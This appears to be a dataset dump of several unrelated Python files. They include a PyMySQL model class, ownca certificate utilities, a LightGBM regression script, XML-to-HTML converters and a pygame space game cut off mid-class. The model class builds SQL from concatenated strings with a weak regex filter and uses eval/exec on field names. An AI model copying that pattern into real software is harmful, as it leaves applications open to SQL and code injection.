pymysql.Connect(\n host=cfg['host'],\n port=cfg['port'],\n user=cfg['user'],\n passwd=cfg['password'],\n db=cfg['db'],\n charset=cfg['charset'],\n )\n\n # 设置主键\n def setPrimaryKey(self,name) : self.__id=name\n # 设置数据表\n def setSource(self,name) : self.__table=name\n\n # 返回SQL\n def getSql(self): return self.__sql\n\n # 查询-单条\n def findFirst(self):\n self.__limit = '0,1'\n self.__getSelect() #生成SQL\n # 执行\n res = self.executeQuery(self.__sql)\n data = {}\n if res['state'] : data=res['list'][0]\n return data\n # 查询-多条\n def find(self):\n self.__getSelect() #生成SQL\n # 执行\n res = self.executeQuery(self.__sql)\n data = {}\n if res['state'] : data=res['list']\n return data\n # 统计条数\n def count(self):\n sql = 'SELECT count(*) as total FROM %s'%(self.__table)\n if self.__where!='' : sql += \" WHERE \"+self.__where\n # 执行\n res = self.executeQuery(sql)\n total = 0\n if res['state'] : total=res['list'][0]['total']\n return total\n # 查询-生成\n def __getSelect(self):\n sql = 'SELECT %s FROM %s'%(self.__columns, self.__table)\n if self.__where!='' : sql += \" WHERE \"+self.__where\n if self.__group!=\"\" : sql += \" GROUP BY \"+self.__group\n if self.__order!=\"\" : sql += \" ORDER BY \"+self.__order\n if self.__limit!=\"\" : sql += \" LIMIT \"+self.__limit\n self.__sql = sql\n\n # 新增\n def create(self):\n self.__sql = '' #默认SQL\n self.__callback('beforeCreate') #回调函数\n self.__getAllFields() #全部字段\n # 组合\n keys = self.__fields.keys()\n vals = ''\n for k in keys :\n if k==self.__id and (self.__fields[k]==None or self.__fields[k]=='null') : vals += 'null,'\n else : vals += '%s,'%self.__fields[k] if (self.__fields[k]==None or self.__fields[k]=='null') else '\"%s\",'%self.filter(self.__fields[k])\n self.__sql = 'INSERT INTO `%s`(`%s`) values(%s)'%(self.__table,'`,`'.join(keys),vals[:-1])\n # 执行\n res = self.executeQuery(self.__sql)\n return True if res['state'] else False\n # 获取自增ID\n def getLastID(self):\n return self.__idVal\n\n # 更新\n def update(self):\n self.__sql = '' #默认SQL\n self.__callback('beforeUpdate') #回调函数\n self.__getAllFields() #全部字段\n # 组合\n keys = self.__fields.keys()\n vals = ''\n for k in keys:\n vals += '%s=%s,'%(k,'null') if self.__fields[k]==None or self.__fields[k]=='null' else 
'%s=\"%s\",'%(k,self.filter(self.__fields[k]))\n self.__sql = 'UPDATE `%s` SET %s WHERE %s'%(self.__table,vals[:-1], self.__where)\n # 执行\n res = self.executeQuery(self.__sql)\n return True if res['state'] else False\n\n # 删除\n def delete(self):\n self.__sql = '' #默认SQL\n self.__callback('beforeDelete') #回调函数\n self.__sql = 'DELETE FROM `%s` WHERE %s'%(self.__table, self.__where)\n # 执行\n res = self.executeQuery(self.__sql)\n return True if res['state'] else False\n\n # Where 条件\n def where(self,where,bind={}):\n # 过滤WHERE\n if len(bind)>0 : where=self.bindWhere(where,bind)\n if where=='' : self.error('Where不能为空!')\n self.__where = where\n return self\n # Table 数据表\n def table(self,str=''):\n self.__table = str\n return self\n # Columns 字段\n def columns(self,str='*'):\n self.__columns = str\n return self\n # Group 分组\n def group(self,str=''):\n self.__group = str\n return self\n # Order 排序\n def order(self,str=''):\n self.__order = str\n return self\n # Limit 限制\n def limit(self,str=''):\n self.__limit = str\n return self\n # 过滤-SQL\n def filter(self, v=''):\n return re.sub(r'.*([\\';]+|(--)+).*','',str(v))\n # 过滤-WHERE\n def bindWhere(self,where,bind):\n for k in bind.keys() :\n v = str(bind[k])\n # 小写、匹配、替换\n lower = v.lower()\n if re.search(self.__sql_reg,lower) :\n print('SQL过滤: '+v)\n return ''\n where = re.sub(r':'+k+':', v, where)\n return where\n\n # 事务-回滚\n def begin(self):\n Model.__rollback = True\n def commit(self):\n Model.__rollback = False\n if Model.__conn!=None :\n Model.__conn.commit()\n Model.__conn.close()\n Model.__conn = None\n\n # 执行SQL\n def executeQuery(self,sql,bind={}):\n __conn = None\n __cs = None\n res = {}\n # 过滤SQL\n if len(bind)>0 : sql=self.bindWhere(sql,bind)\n try:\n # 回滚\n if Model.__rollback :\n if Model.__conn==None : Model.__conn = __conn = self.__connect('rollback')\n else : __conn = Model.__conn\n else : __conn = self.__connect()\n # 类型\n type = sql[0:1].lower()\n if type=='s' :\n # 查询\n __cs = __conn.cursor(cursor=pymysql.cursors.DictCursor)\n num = __cs.execute(sql)\n list = __cs.fetchall()\n list = {} if list==None else list\n res = {'state':True if num>0 else False,'num':num,'list':list}\n else :\n __cs = __conn.cursor()\n num = __cs.execute(sql)\n res = {'state':True,'num':num}\n if type=='i' :\n self.__idVal = __cs.lastrowid\n res['id'] = self.__idVal\n # 提交\n if not Model.__rollback : __conn.commit()\n except Exception as e:\n if Model.__rollback and __conn!=None : __conn.rollback()\n print(\"执行失败: \",e)\n print(sql)\n res = {'state':False,'msg':e}\n finally :\n # 关闭\n if __cs!=None : __cs.close()\n # 关闭链接\n if not Model.__rollback and __conn!=None : __conn.close()\n return res\n\n # 验证&取值\n def __getAllFields(self):\n self.__fields = {}\n methods = dir(self)\n fields = self.__setFields()\n for name in fields.keys():\n mName = name.capitalize()\n val = fields[name]\n val = '\"%s\"'%str(val) if type(val)==str else str(val)\n # 设置\n if 'set'+mName in methods: exec('self.set'+mName+'('+val+')')\n # 获取\n if 'get'+mName in methods: self.__fields[name]=eval('self.get'+mName+'()')\n else : self.__fields[name] = fields[name]\n # 获取-字段&值\n def __setFields(self) :\n arr = self.__dict__\n fields = {}\n for key in arr.keys():\n if key[1] != 'M': fields[key]=arr[key]\n return fields\n # 回调函数\n def __callback(self,name):\n methods = dir(self)\n if name in methods : 
self.__fields=eval('self.'+name+'()')\n","sub_path":"python/app/model/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"307975507","text":"#!bin/usr/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef rectangle_rule(func,intervall_start,intervall_end,stepsize):\n sum = 0\n x_t = 0\n xs = [x_t]\n integral_t = 0\n for i in range(intervall_start,intervall_end):\n integral_delta_t = stepsize*func(intervall_start+i)\n x_t += integral_t + integral_delta_t\n integral_t = integral_delta_t\n xs.append(x_t)\n return xs\n\n\ndef f(t):\n return 0.5*(200*np.exp(-0.5*t))-0.3*(200*(0.5/(0.5-0.3))*(np.exp(-0.3*t)-np.exp(-0.5*t)))\n\ndef save_to_txt(states,times,path):\n with open(path,\"w\") as output:\n output.write(\",\".join([str(time) for time in times]))\n output.write(\"\\n\")\n output.write(\",\".join([str(round(state,2)) for state in states]))\n\n\n\ndef main():\n stepsize = 1\n intervall_start = 0\n intervall_end = 24\n xs = rectangle_rule(f,intervall_start,intervall_end,stepsize)\n real_xs = [(200*(0.5/(0.5-0.3))*(np.exp(-0.3*t)-np.exp(-0.5*t))) for t in range(0,intervall_end)]\n save_to_txt(xs,range(intervall_start,intervall_end),\"Exc6Task3a.txt\")\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"task6/Exc6task3a.py","file_name":"Exc6task3a.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"918840","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright (c) 2018-2021 Kairo de Araujo\n\"\"\"\n\nfrom glob import glob\nimport os\nimport re\n\nfrom ._constants import (\n CA_CERT,\n CA_CERTS_DIR,\n CA_CSR,\n CA_CRL,\n CA_KEY,\n CA_PUBLIC_KEY,\n CA_PRIVATE_DIR,\n HOSTNAME_REGEX,\n)\nfrom .exceptions import OwnCAIntermediate\n\n\ndef file_data_status(ca_status):\n \"\"\"\n Verify the CA status based in the existent files.\n\n :param ca_status: current ``ca_status`` file dictionary:\n ``ownca.utils.ownca_directory``\n :type ca_status: dict, required\n\n :return: True, False or None\n :rtype: bool/None\n \"\"\"\n key = ca_status.get(\"key\")\n cert = ca_status.get(\"certificate\")\n csr = ca_status.get(\"csr\")\n\n # this check if the CA has the key and certificates files in disk\n # if both are true, means the health status is True\n if key == cert and key is True:\n return True\n\n # if certificate and key does not match and one of then are True, is not ok\n elif key != cert and key or cert:\n if csr:\n raise OwnCAIntermediate(\"Intermediate CA Missing the certificate.\")\n\n return False\n\n # in that case, the system has not a CA configured.\n else:\n return None\n\n\ndef _create_ownca_dir(ownca_dir):\n \"\"\"\n Creates the CA directory.\n\n :param ownca_dir: :string: full path directory for ownca\n :return: bool\n \"\"\"\n try:\n if not os.path.isdir(ownca_dir):\n os.mkdir(ownca_dir)\n\n except (FileExistsError, OSError, FileNotFoundError) as err:\n raise err\n\n\ndef ownca_directory(ca_storage):\n \"\"\"\n Validates and manage CA storage directory and subfolders structure files.\n\n :param ca_storage: CA storage\n :type ca_storage: string, required\n :return: dict with state of ownca storage files\n :rtype: dict\n\n .. highlight:: python\n .. 
code-block:: python\n\n {\n \"certificate\": bool,\n \"crl\": bool,\n \"key\": bool,\n \"public_key\": bool,\n \"ca_home\": None or str,\n }\n\n \"\"\"\n if \"CA_test\".lower() in ca_storage.lower() and not os.getenv(\"TEST_MODE\"):\n raise ValueError(\n f\"Not allowed {ca_storage}. Please do not use a name that \"\n + \"contains 'ca_test'\"\n )\n\n ownca_status = {\n \"type\": \"Certificate Authority\",\n \"ca_home\": None,\n \"certificate\": False,\n \"crl\": False,\n \"csr\": False,\n \"key\": False,\n \"public_key\": False,\n }\n\n if not os.path.isdir(ca_storage):\n os.mkdir(ca_storage)\n\n ownca_subdirs = [CA_CERTS_DIR, CA_PRIVATE_DIR]\n current_subdirs = glob(f\"{ca_storage}/*\")\n\n for ownca_subdir in ownca_subdirs:\n ca_storage_sub_dir = os.path.join(ca_storage, ownca_subdir)\n if ca_storage_sub_dir not in current_subdirs:\n ownca_status[\"ca_home\"] = \"Inconsistent!\"\n _create_ownca_dir(ca_storage_sub_dir)\n\n ownca_status[\"ca_home\"] = ca_storage\n\n if os.path.isfile(os.path.join(ca_storage, CA_CERT)):\n ownca_status[\"certificate\"] = True\n\n if os.path.isfile(os.path.join(ca_storage, CA_CSR)):\n ownca_status[\"csr\"] = True\n ownca_status[\"type\"] = \"Intermediate Certificate Authority\"\n\n if os.path.isfile(os.path.join(ca_storage, CA_CRL)):\n ownca_status[\"crl\"] = True\n\n if os.path.isfile(os.path.join(ca_storage, CA_KEY)):\n ownca_status[\"key\"] = True\n\n if os.path.isfile(os.path.join(ca_storage, CA_PUBLIC_KEY)):\n ownca_status[\"public_key\"] = True\n\n return ownca_status\n\n\ndef store_file(file_data, file_path, permission=None, force=False):\n \"\"\"\n Stores (write) files in the storage\n\n :param file_data: the file data\n :type file_data: str, required\n :param file_path: the file absolute path\n :type file_path: str, required\n :param permission: operating-system mode bitfield\n :type permission: int, optional\n :return: bool\n :rtype: boolean\n \"\"\"\n if os.path.isfile(file_path) and force is False:\n raise FileExistsError(f\"{file_path} already exists.\")\n\n try:\n with open(file_path, \"w\") as f:\n f.write(file_data.decode(\"utf-8\"))\n\n if permission:\n os.chmod(file_path, permission)\n\n except OSError as err:\n raise err\n\n return True\n\n\ndef validate_hostname(hostname):\n \"\"\"\n Validates if the hostname follows the common Internet rules for FQDN\n\n :param hostname: string hostname\n :type hostname: sting, required\n :return: bool\n :rtype: bool\n \"\"\"\n\n if type(hostname) is not str:\n return False\n\n if len(hostname) < 1 or len(hostname) > 253:\n return False\n\n ldh_re = re.compile(f\"{HOSTNAME_REGEX}\", re.IGNORECASE)\n\n return all(ldh_re.match(x) for x in hostname.split(\".\"))\n","sub_path":"ownca/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"641746139","text":"class Item:\n def __init__(self,name,description,pick_up=False):\n self.name=name\n self.description=description\n self.pick_up=pick_up\n def is_taken(self,item):\n if self.pick_up==True:\n print(f'You have picked up {item.name}')\n else:\n print(f'You have dropped {item.name}')\n \n\n ","sub_path":"src/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"95174229","text":"import lightgbm as lgb\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics 
import mean_squared_error\n\ndf_train = pd.read_csv('train.csv')\ndf_train.loc[:, 'DistanceToFirstStop_p20':'DistanceToFirstStop_p80'] = np.around(\n df_train.loc[:, 'DistanceToFirstStop_p20':'DistanceToFirstStop_p80'])\ndf_test = pd.read_csv('test.csv')\n\n\n# calculate angle.\ndef getAngle(df_train):\n angleValue = {'N': 0, 'NE': 45, 'E': 90, 'SE': 135, 'S': 180, 'SW': 225, 'W': 270, 'NW': 315}\n a = df_train['EntryHeading']\n b = df_train['ExitHeading']\n angle = abs(angleValue[b] - angleValue[a])\n if angle > 180:\n angle -= 180\n return angle\n\n\ndf_train['angle'] = df_train.apply(getAngle, axis=1)\n\ndata = pd.get_dummies(df_train, columns=['Hour', 'Weekend', 'Month', 'City', 'angle'])\ndata = data.drop(\n ['RowId', 'IntersectionId', 'Latitude', 'Longitude', 'EntryStreetName', 'ExitStreetName', 'EntryHeading',\n 'ExitHeading', 'Path'], axis=1)\n\ny = np.array(data.loc[:, 'DistanceToFirstStop_p50'])\nx = np.array(data.loc[:, 'Hour_0': 'angle_180'])\n\ndf_test['angle'] = df_test.apply(getAngle, axis=1)\ndata1 = pd.get_dummies(df_test, columns=['Hour', 'Weekend', 'Month', 'City', 'angle'])\ndata1 = data1.drop(\n ['RowId', 'IntersectionId', 'Latitude', 'Longitude', 'EntryStreetName', 'ExitStreetName', 'EntryHeading',\n 'ExitHeading', 'Path'], axis=1)\n\nx1 = np.array(data1.loc[:, 'Hour_0': 'angle_180'])\n\n# https://github.com/apachecn/lightgbm-doc-zh.\n# Divide training set and validation set.\nxTrainAll, xPredict, yTrainAll, yPredict = train_test_split(x, y, test_size=0.10, random_state=100)\nxTrain, xTest, yTrain, yTest = train_test_split(xTrainAll, yTrainAll, test_size=0.2, random_state=100)\ntrain_data = lgb.Dataset(data=xTrain, label=yTrain)\ntest_data = lgb.Dataset(data=xTest, label=yTest)\n\n# Set parameters of the model.\nparam = {'num_leaves': 31, 'num_trees': 100, 'objective': 'regression'}\nparam['metric'] = 'RMSE'\n\n# Train the model based on the training dataset.\n# Set early stopping rounds for the model.\nnum_round = 100\nmodel = lgb.train(param, train_data, num_round, valid_sets=[test_data], early_stopping_rounds=100)\n\n# Save the model.\nmodel.save_model('model.txt', num_iteration=model.best_iteration)\n\n# Conduct cross-validation for the model.\nlgb.cv(param, train_data, num_round, nfold=5, early_stopping_rounds=100)\n\n# Predict the validation dataset based on the established model.\npredictions = model.predict(xPredict, num_iteration=model.best_iteration)\n\n# Compute the root mean squared error(RMSE) to evaluate the effect of the model.\nRMSE = np.sqrt(mean_squared_error(yPredict, predictions))\nprint(\"RMSE of predict :\", RMSE)\n\n# A saved model can be loaded and predict the test data file.\nbst = lgb.Booster(model_file='model.txt') # init model\npred = bst.predict(x1, num_iteration=bst.best_iteration)\n\n\n\n\n\n\n\n\n","sub_path":"LightGBM.py","file_name":"LightGBM.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479413080","text":"# coding:utf-8\nimport os\nimport re\nimport time\nimport xml\nimport xml.etree.ElementTree as ET\n# 全局唯一标识\nunique_id = 1\n\n# 遍历所有的节点\ndef walkData(root_node, level, result_list):\n global unique_id\n #temp_list = [unique_id, level, root_node.tag, root_node.text, root_node.attrib]\n #result_list.append(temp_list)\n if (len(root_node.tag) == 8)and (root_node.tag.startswith(\"P\")):\n temp_list = [root_node.tag, root_node.text]\n result_list.append(temp_list)\n\n # 遍历每个子节点\n children_node = root_node.getchildren()\n if 
len(children_node) == 0:\n return\n for child in children_node:\n walkData(child, level + 1, result_list)\n return\n\n\ndef getXmlData(file_name):\n level = 1 # node depth starts from 1\n result_list = []\n root = ET.parse(file_name).getroot()\n walkData(root, level, result_list)\n\n return result_list\n\ndef generationHtmlTemplate(htmlFilePath, newFilePath, result_list):\n # update the html file\n htmlFile = open(htmlFilePath, 'r', encoding='utf-8')\n newHtmlFile = open(newFilePath, 'w', encoding='utf-8')\n for line in htmlFile:\n for item in result_list:\n findStr = '>' + item[1] + '<'\n newStr = '{' + item[0] + '}'\n if findStr in line:\n newline = line.replace(item[1], newStr, 1)\n line = newline\n result_list.remove(item)\n break\n newHtmlFile.write(line)\n htmlFile.close()\n newHtmlFile.close()\n\ndef isValidDate(date):\n try:\n time.strptime(date, \"%Y-%m-%dT%H:%M:%S.000+08:00\")\n return True\n except (ValueError, TypeError):\n return False\n\ndef is_number(str):\n try:\n float(str)\n return True\n except ValueError:\n return False\n\ndef intcomma(value):\n orig = str(value)\n new = re.sub(\"^(-?\\d+)(\\d{3})\", '\\g<1>,\\g<2>', orig)\n if orig == new:\n return new\n else:\n return intcomma(new)\n\ndef dateInfoTransform(result_list):\n for item in result_list:\n if isValidDate(item[1]):\n newDateStr = item[1].replace('-', '.', 3)\n dateList = newDateStr.split('T')\n newDateStr = dateList[0]\n item[1] = newDateStr\n elif is_number(item[1]):\n if item[0].endswith(('J01','J02','J03','J04','J05')):\n newMoneyStr = intcomma(item[1])\n item[1] = newMoneyStr\n\nif __name__ == '__main__':\n #read the xml file\n file_name = \"F:/Code/pythonTest/testFile/王小二.xml\"\n result_list = getXmlData(file_name)\n dateInfoTransform(result_list)\n\n htmlPath = 'F:/Code/pythonTest/testFile/王二小报告全集.html'\n generationPath = './template.html'\n if os.path.exists(generationPath):\n os.remove(generationPath)\n generationHtmlTemplate(htmlPath, generationPath, result_list)\n # f = open('./output.txt', 'a')\n # for item in result_list:\n # f.write('\\n' + str(item))\n # f.close()\n # pass\n","sub_path":"xmlToHtml/readXml.py","file_name":"readXml.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"487670502","text":"# -*- coding: UTF-8 -*-\r\nimport xml.etree.ElementTree as ET\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\n\r\ndef get_dir_list(path):\r\n\r\n #res is the dict that stores the xml result; start with it empty\r\n res = {}\r\n\r\n #build the ElementTree\r\n webxml= ET.parse(path)\r\n\r\n #find all website names\r\n web_names=webxml.findall('web_name')\r\n\r\n #debug: print every website's info\r\n #print web_names\r\n\r\n #collect all the info for each website\r\n for web_name in web_names:\r\n\r\n #print each website's name\r\n #print web_name.attrib['name']\r\n #use the website name as key; the value stays empty until the info below is collected\r\n key = web_name.attrib['name']\r\n res[key]=''\r\n\r\n #the value is also a dict, initially empty\r\n key_value = {}\r\n\r\n #find the site's list categories; web_lis is a list\r\n web_lis = web_name.getchildren()\r\n\r\n #loop over them\r\n for web_li in web_lis:\r\n\r\n #get each category's name\r\n #print web_li.attrib['name']\r\n web_li_name = web_li.attrib['name']\r\n\r\n #likewise add it as a key of the value dict\r\n key_value[web_li_name]=''\r\n\r\n #find the url and node attributes needed to crawl this category's list pages, and those for the detail pages\r\n all_attrs = web_li.getchildren()\r\n #debug print\r\n #print all_attrs\r\n value_dir={}\r\n #read this site's key settings for the category from the xml file\r\n for all_attr in all_attrs:\r\n #print all_attr\r\n\r\n #url prefix\r\n if(all_attr.attrib['name']==\"start_pattrern\"):\r\n #debug print\r\n #print \"网址前缀:\"+all_attr.text\r\n #record it in the dict\r\n value_dir['start_pattrern']=all_attr.text\r\n\r\n #url suffix\r\n 
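# each branch below keys off the node's name attribute; e.g. an element like <attr name=\"end_pattrern\">.html</attr> would match here (the tag name is illustrative only; the parser reads just the name attribute and the text)\r\n 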
if(all_attr.attrib['name']==\"end_pattrern\"):\r\n #print \"网址后缀:\"+all_attr.text\r\n value_dir['end_pattrern']=all_attr.text\r\n\r\n #number of pages to crawl\r\n if(all_attr.attrib['name']==\"page_num\"):\r\n #print \"构造页数:\"+all_attr.text\r\n value_dir['page_num']=all_attr.text\r\n\r\n #whether the first page needs special handling\r\n if(all_attr.attrib['name']==\"special\"):\r\n if(all_attr.attrib['id']==\"0\"):\r\n #print \"无需特殊处理\"\r\n key_value['special']='0'\r\n key_value['special_char']=\"\"\r\n else:\r\n #print \"需要特殊处理——处理符号为:\"+all_attr.text\r\n key_value['special']='1'\r\n key_value['special_char']=all_attr.text\r\n\r\n\r\n #when the node carries the list attributes, they form a dict\r\n li_attr_dir = {}\r\n if(all_attr.attrib['name']==\"li_attr\"):\r\n li_attrs = all_attr.getchildren()\r\n for li_attr in li_attrs:\r\n #print \"需要抓取列表url的属性为\"+li_attr.attrib['name']+ \"=\" +li_attr.text\r\n li_attr_dir[li_attr.attrib['name']]=li_attr.text\r\n\r\n\r\n #assign the dict to the li_attr key\r\n key_value['li_attr']=li_attr_dir\r\n\r\n\r\n if(all_attr.attrib['name']==\"filename\"):\r\n # debug\r\n #print \"需要保存的文件名:\"+all_attr.attrib['save']\r\n key_value['save_file_name']=all_attr.attrib['save']\r\n\r\n article_attrs = all_attr.getchildren()\r\n for article_attr in article_attrs:\r\n article_dir={}\r\n #print article_attr.attrib['name']+ \":\" + article_attr.getchildren()[0].attrib['name']+\"=\"+article_attr.getchildren()[0].text\r\n article_dir[ article_attr.getchildren()[0].attrib['name']]=article_attr.getchildren()[0].text\r\n key_value[article_attr.attrib['name']]=article_dir\r\n\r\n key_value[web_li_name]=value_dir\r\n res[key]=key_value\r\n return res\r\n\r\n","sub_path":"dir_list.py","file_name":"dir_list.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"8697508","text":"\n\nclass Service:\n\tsecret=\"Yongu has two\"\n\tdef setname(self,name):\n\t\tself.name=name\n\tdef sum(self,a,b):\n\t\tresult=a+b\n\t\tprint(\"%s nim %s + %s = %s \"%(self.name,a,b,result))\n\na=Service()\na.setname(\"Changheon Lee\")\na.sum(5,6)\n","sub_path":"language/python/class/clss.py","file_name":"clss.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"432957573","text":"import pygame, sys, math, random, textwrap\r\nfrom pygame.locals import *\r\nfrom physics import vector, vecSum, vecDif, multSc, vecMag, unitVec, gravityField\r\n\r\n# set color constants\r\n# R G B\r\nGRAY = (100, 100, 100)\r\nNAVYBLUE = ( 60, 60, 100)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0,0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nYELLOW = (255, 255, 0)\r\nORANGE = (255, 128, 0)\r\nPURPLE = (255, 0, 255)\r\nCYAN = (0, 255, 255)\r\nBLACK = (0, 0, 0)\r\n\r\ntrajColor=Color(0, 255, 0, 10)\r\nbuttonTextColor=Color(0, 80, 255, 255)\r\nfadedPurpleColor=Color(189, 164, 189, 255)\r\ntitleColor=Color(179, 31, 15, 255)\r\n\r\n\r\nFPS = 30\r\nWINDOWWIDTH = 800 # size of window width in pixels\r\nWINDOWHEIGHT = 600 # size of window height in pixels\r\n\r\n#time constant\r\ndeltaT=1\r\n\r\n#ship engine power\r\nengine=0.2\r\n\r\n#reciprocal of the ship's rotational moment of inertia\r\nrotIner=0.2\r\n\r\n#ship rotation speed\r\nrotSpeed=0.1\r\n\r\n#ratio to convert radians to degrees\r\nradDegRatio=180/math.pi\r\n\r\n#sides of the ship\r\nshipHeight = 32\r\nshipWidth = 16\r\n\r\n#sides of the foe's rockets\r\nrocketHeight=8\r\nrocketWidth=4\r\n\r\n#speed of plasma shots of foe planets\r\nplasmaSpeed=2.0\r\n\r\n#max speed of asteroids inside 
catcher\r\nmaxInCatcherSpeed=5.0\r\n\r\n#speed of catcher's push\r\nspeedCatcherPush=5.0\r\n\r\n#fuel consumption parameters\r\nengineConsumption=0.05\r\nshuntingEngineConsumption=0.005\r\nnavigateConsumption=0.02\r\n\r\n#load last level\r\nf=open(\"currentLevel\", \"r\")\r\nline=f.readline().rstrip()\r\ncurrentLevelNumber=int(line)\r\nf.close()\r\n\r\n# display settings initiation\r\nglobal FPSCLOCK, DISPLAYSURF\r\npygame.init()\r\nFPSCLOCK = pygame.time.Clock()\r\nmyfont = pygame.font.SysFont(\"arial\", 15)\r\nbigFont = pygame.font.SysFont(\"arial\", 20, True)\r\nsmallFont=pygame.font.SysFont(\"monospace\", 10)\r\nhugeFont=pygame.font.SysFont(\"impact\", 40)\r\n\r\nDISPLAYSURF = pygame.display.set_mode ((WINDOWWIDTH, WINDOWHEIGHT))\r\npygame.display.set_caption('Space adventures', 'Space adventures')\r\n\r\n#download images\r\nplayerImg= pygame.image.load('images/rocket.png').convert_alpha()\r\nmainEngineImg= pygame.image.load('images/rocketMainEngine.png').convert_alpha()\r\nrightShuntingEngineImg= pygame.image.load('images/rocketRightEngine.png').convert_alpha()\r\nleftShuntingEngineImg= pygame.image.load('images/rocketLeftEngine.png').convert_alpha()\r\nleftRightShuntingEngineImg= pygame.image.load('images/rocketLeftRightEngine.png').convert_alpha()\r\nmainLeftShuntingEngineImg= pygame.image.load('images/rocketMainLeftEngine.png').convert_alpha()\r\nmainRightShuntingEngineImg= pygame.image.load('images/rocketMainRightEngine.png').convert_alpha()\r\nmainLeftRightShuntingEngineImg=pygame.image.load('images/rocketMainLeftRightEngine.png').convert_alpha()\r\nneutPlanetImg=pygame.image.load('images/neutPlanet.png').convert_alpha()\r\nfrPlanetImg=pygame.image.load('images/frPlanet.png').convert_alpha()\r\nfoePlanetImg=pygame.image.load('images/foePlanet.png').convert_alpha()\r\nrocketImg=pygame.image.load('images/foeRocket.png').convert_alpha()\r\nmineralImg=pygame.image.load('images/mineral.png').convert_alpha()\r\nasteroidImg=pygame.image.load('images/asteroid.png').convert_alpha()\r\nasteroidTailImg=pygame.image.load('images/asteroidTail.png').convert_alpha()\r\nstartImg=pygame.image.load('images/start.png').convert_alpha()\r\nfinishImg=pygame.image.load('images/finish.png').convert_alpha()\r\nfinishActiveImg=pygame.image.load('images/finishActive.png').convert_alpha()\r\nbackground=pygame.image.load('images/background.png').convert_alpha()\r\nmenuBackground=pygame.image.load('images/menu.png').convert_alpha()\r\nbuttonImg=pygame.image.load('images/button20040.png').convert_alpha()\r\nbuttonPressedImg=pygame.image.load('images/buttonPressed20040.png').convert_alpha()\r\nhelpPageImg=pygame.image.load('images/helpPage.png').convert_alpha()\r\nmainMenuImg=pygame.image.load('images/mainMenuPicture.png').convert_alpha()\r\n#download explosion\r\nexplosions=[]\r\nexplosion1=pygame.image.load('images/explosion1.png').convert_alpha()\r\nexplosions.append(explosion1)\r\nexplosion2=pygame.image.load('images/explosion2.png').convert_alpha()\r\nexplosions.append(explosion2)\r\nexplosion3=pygame.image.load('images/explosion3.png').convert_alpha()\r\nexplosions.append(explosion3)\r\nexplosion4=pygame.image.load('images/explosion4.png').convert_alpha()\r\nexplosions.append(explosion4)\r\nexplosion5=pygame.image.load('images/explosion5.png').convert_alpha()\r\nexplosions.append(explosion5)\r\nexplosion6=pygame.image.load('images/explosion6.png').convert_alpha()\r\nexplosions.append(explosion6)\r\n#download ship's 
explosion\r\nshipExplosion=[]\r\nexplosion1=pygame.image.load('images/rocketExplosion1.png').convert_alpha()\r\nshipExplosion.append(explosion1)\r\nexplosion2=pygame.image.load('images/rocketExplosion2.png').convert_alpha()\r\nshipExplosion.append(explosion2)\r\nexplosion3=pygame.image.load('images/rocketExplosion3.png').convert_alpha()\r\nshipExplosion.append(explosion3)\r\nexplosion4=pygame.image.load('images/rocketExplosion4.png').convert_alpha()\r\nshipExplosion.append(explosion4)\r\nexplosion5=pygame.image.load('images/rocketExplosion5.png').convert_alpha()\r\nshipExplosion.append(explosion5)\r\nexplosion6=pygame.image.load('images/rocketExplosion6.png').convert_alpha()\r\nshipExplosion.append(explosion6)\r\n#download finish animation\r\nfinishAnimation=[]\r\nanimation1=pygame.image.load('images/finishAnim1.png').convert_alpha()\r\nfinishAnimation.append(animation1)\r\nanimation2=pygame.image.load('images/finishAnim2.png').convert_alpha()\r\nfinishAnimation.append(animation2)\r\nanimation3=pygame.image.load('images/finishAnim3.png').convert_alpha()\r\nfinishAnimation.append(animation3)\r\nanimation4=pygame.image.load('images/finishAnim4.png').convert_alpha()\r\nfinishAnimation.append(animation4)\r\nanimation5=pygame.image.load('images/finishAnim5.png').convert_alpha()\r\nfinishAnimation.append(animation5)\r\nanimation6=pygame.image.load('images/finishAnim6.png').convert_alpha()\r\nfinishAnimation.append(animation6)\r\n#download sounds\r\nshipExplosionSound=pygame.mixer.Sound(\"sounds/ShipExplosion.wav\")\r\nfinishSound=pygame.mixer.Sound(\"sounds/Sound.wav\")\r\nbuttonSound=pygame.mixer.Sound(\"sounds/Sound.wav\")\r\nengineSound=pygame.mixer.Sound(\"sounds/Sound.wav\")\r\n\r\nclass battleShip(pygame.sprite.Sprite):\r\n def __init__(self, position=vector((0,0))): #takes position as a vector input\r\n pygame.sprite.Sprite.__init__(self)\r\n # defines initial position and characteristics of the battle ship\r\n self.position=position\r\n self.speed=vector((0, 0))\r\n self.acc=vector((0, 0))\r\n self.onOrbit=False\r\n self.trajectory=[]\r\n self.alive=True\r\n self.catcherRadius=20\r\n self.catcherOn=False\r\n self.asteroidCaught=None\r\n self.speedDelta=vector((0, 0))\r\n self.angleDelta=0.0\r\n self.mainEngine=False\r\n self.leftShuntingEngine=False\r\n self.rightShuntingEngine=False\r\n 